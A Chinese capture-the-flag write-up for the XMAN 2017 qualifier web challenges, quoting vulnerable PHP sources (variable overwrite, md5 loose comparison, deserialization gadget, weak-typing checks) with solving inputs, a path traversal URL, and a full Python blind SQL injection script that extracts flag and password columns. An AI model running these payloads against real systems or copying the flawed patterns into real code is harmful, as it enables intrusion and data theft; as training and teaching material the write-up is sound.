XMAN 2017 选拔赛 web部分wp

没报名xman2017夏令营,不过选拔赛去瞄了一眼web题,目测不难

variacover

<meta charset="utf-8">
<?php
// Challenge source (variacover). Without a ?b= parameter the script prints
// itself; otherwise the request is run through the flag check below.
error_reporting(0);
if (empty($_GET['b'])) {
    show_source(__FILE__);
    die();
}else{
    include('flag.php');
$a = "www.XMAN.com";
$b = $_GET['b'];
// parse_str() called with a single argument writes every key of the query
// string into the current scope, so the request can overwrite $a after the
// assignment above (variable overwrite). Mitigation: pass a result array as
// the second argument instead of letting it populate local variables.
@parse_str($b);
// Loose comparison (==) of two md5() hex digests: PHP compares digests of the
// form 0e<digits> as numeric strings (all equal to zero), so a value other than
// 'QNKCDZO' whose digest has that shape passes this test. Mitigation: compare
// with === (or hash_equals()).
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
    echo $flag;
}else{
exit('你的答案不对0.0');
}
}
?>

php弱类型,变量覆盖

urldecode

URL双编码

unserialize

class FileClass{
    // Deserialization gadget: unserialize() restores $filename from the
    // serialized input, and the next string conversion of the object reads
    // that file. Untrusted data must never reach unserialize() for this class.
    public $filename = 'error.log';

    public function __toString(){
        $path = $this->filename;
        return file_get_contents($path);
    }
}

php反序列化

// Produce the serialized FileClass instance shown in the writeup, with
// $filename pointed at flag.php instead of the default error.log.
$a = new FileClass;
$a->filename = 'flag.php';
print serialize($a);

O:9:"FileClass":1:{s:8:"filename";s:8:"flag.php";}

Welcome2IRC

这个真的是web题吗。。。随便找个irc客户端。。。

PHP

http://challenges.xctf.org.cn:8004/index.php~

<?php
// Challenge source (PHP). Three independent checks each set one of $a, $b, $c;
// flag.php is only included when all three are set.
$a=0;
$b=0;
$c=0;
if (isset($_GET['aaa']))
{
        $aaa = $_GET['aaa'];
        $aaa=="1"?die("Emmm..."):NULL;
        // "case 0" has no break, so any value switch() matches against 0 (loose
        // comparison) falls through into the "case 1" body and sets $a.
        switch ($aaa)
        {
        case 0:
        case 1:
                $a=1;
                break;
        }
}
$bbb=(array)json_decode(@$_GET['bbb']);
if(is_array($bbb)){
    // is_numeric() rejects digit strings, but in PHP 7 and earlier a value with
    // trailing whitespace is not "numeric" to is_numeric() while the loose
    // comparison ">2017" below still evaluates it as a number (PHP 8 changed
    // is_numeric() to accept trailing whitespace).
    is_numeric(@$bbb["ccc"])?die("Emmm..."):NULL;
    if(@$bbb["ccc"]){
        ($bbb["ccc"]>2017)?$b=1:NULL;
    }
    if(is_array(@$bbb["ddd"])){
        if(count($bbb["ddd"])!==2 OR !is_array($bbb["ddd"][0])) die("Emmm...");
        // array_search() compares loosely when the third argument is omitted,
        // so an element that is not the string "XMAN" can still match here,
        // while the strict === check in the foreach below finds no exact match.
        // Mitigation: pass true as the third argument for a strict search.
        $eee = array_search("XMAN", $bbb["ddd"]);
        $eee===false?die("Emmm..."):NULL;
        foreach($bbb["ddd"] as $key=>$val){
            $val==="XMAN"?die("Emmm..."):NULL;
        }
        $c=1;
}
}
if($a && $b && $c){
    include "flag.php";
    echo $flag;
}
?>

几个点:aaa:switch没加break,当然弱类型也可以,ccc:加空格绕过is_numeric,ddd:array_search弱类型比较
aaa=&bbb={"ccc":"2018 ","ddd":[[],0]}

download

http://challenges.xctf.org.cn:7775/README.md
http://blog.csdn.net/hitwangpeng/article/details/45602187

http://challenges.xctf.org.cn:7775/components/filemanager/download.php?path=../../../../../../../var/www/flag.txt&type=undefined

CTF用户登录

sql盲注

# -*- coding:utf-8 -*-  
import requests
import string
#tab=string.printable

site = 'http://challenges.xctf.org.cn:8003/'
url = '%slogin.php' % site

# Browser-like headers; the login form is submitted url-encoded.
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7",
    "Content-Type": "application/x-www-form-urlencoded",
}
# Local intercepting proxy; defined here but not passed to any request in
# this listing.
proxies = {"http": "http://127.0.0.1:8080"}

# One session object so cookies returned by the server are reused across calls.
s = requests.session()

def login(username):
    """Submit one login attempt for *username* (empty password) and return the raw response body (bytes)."""
    form = {
        'username': username,
        'password': '',
        'submit': 'submit',
    }
    resp = s.post(url, data=form, headers=headers)
    return resp.content

def wafbypass(sql):
    """Return *sql* with every space character replaced by a tab.

    Presumably the challenge's input filter only looked for ' ' (not shown
    here); a server-side filter should normalise all whitespace, not one
    character, so substitutions like this have no effect.
    """
    return sql.replace(' ', '\t')

def exp(index):
    """Return the character at 1-based position *index* of the targeted value, or "?" if none matched.

    Boolean-based blind SQL injection: for each candidate in string.printable
    one login attempt is sent whose condition is true only when the character
    matches, and the response is checked for the success marker. A single call
    can therefore issue up to len(string.printable) near-identical login
    requests differing by one character -- a pattern that stands out in
    authentication logs and is worth alerting on.
    """

    for word in string.printable:
        #sql = "select database() limit 1"
        #username = "admin'and (mid((select database() limit 1) from %d for 1)='%s')#" % (index,word)
        #username = "admin'and (mid((select schema_name from information_schema.schemata limit 1 offset 1) from %d for 1)='%s')#" % (index,word)
        #username = "admin'and (mid((select table_name from information_schema.tables where table_schema='comeon23333' limit 1 offset 0) from %d for 1)='%s')#" % (index,word)
        #username = "admin'and (mid((select column_name from information_schema.columns where table_schema='xman' and table_name='ctf_users' limit 1 offset 3) from %d for 1)='%s')#" % (index,word)
        username = "admin'and (mid((select ggflag from ctf_flags limit 1 offset 0) from %d for 1)='%s')#" % (index,word)
        username = wafbypass(username)
        #print username
        #print login(username).decode("utf8", "ignore")
        #print "成功".decode("utf8", "ignore")
        # Python 2: both sides are decoded to unicode before the substring test;
        # "strict" raises UnicodeDecodeError if the response body is not UTF-8.
        if "成功".decode("utf8", "ignore") in login(username).decode("utf8", "strict"):
            #flag = flag + word
            return word
    return "?"

def exp_use_ascii(index):
    """Return the character at 1-based position *index* of the targeted value, or "?" if none matched.

    Same boolean-based blind technique as exp(), but the payload compares the
    ASCII code of the character (ascii(...) = ord(word)) rather than the quoted
    character. Like exp(), one call can issue up to len(string.printable)
    near-identical login requests -- detectable as a burst of failed logins for
    the same account that differ by a single character.
    """

    for word in string.printable:
        #sql = "select database() limit 1"
        #username = "admin'and (mid((select database() limit 1) from %d for 1)='%s')#" % (index,word)
        #username = "admin'and (mid((select schema_name from information_schema.schemata limit 1 offset 1) from %d for 1)='%s')#" % (index,word)
        #username = "admin'and (mid((select table_name from information_schema.tables where table_schema='comeon23333' limit 1 offset 0) from %d for 1)='%s')#" % (index,word)
        #username = "admin'and (mid((select column_name from information_schema.columns where table_schema='xman' and table_name='ctf_users' limit 1 offset 3) from %d for 1)='%s')#" % (index,word)
        username = "admin'and (ascii(mid((select gpass from ctf_users limit 1 offset 1) from %d for 1))=%d)#" % (index,ord(word))
        username = wafbypass(username)
        #print ord(word)
        #print username
        #print login(username).decode("utf8", "ignore")
        #print "成功".decode("utf8", "ignore")
        # Python 2: both sides are decoded to unicode before the substring test;
        # "strict" raises UnicodeDecodeError if the response body is not UTF-8.
        if "成功".decode("utf8", "ignore") in login(username).decode("utf8", "strict"):
            #flag = flag + word
            return word
    return "?"

print 'begin'
flag = ''
# Recover positions 1..99 one character at a time; exp_use_ascii() yields "?"
# for a position where no candidate matched.
for i in range(1,100):
    flag = flag + exp_use_ascii(i)
# NOTE(review): the listing lost its indentation; this print may originally
# have sat inside the loop (progress output) rather than after it -- confirm.
print flag

upload

.htaccess上传绕过
不过好像有很多搅屎的